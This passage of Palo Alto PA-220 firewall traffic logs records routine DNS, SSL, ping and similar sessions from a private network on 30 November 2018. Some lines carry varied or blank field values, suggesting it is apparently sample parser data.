16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 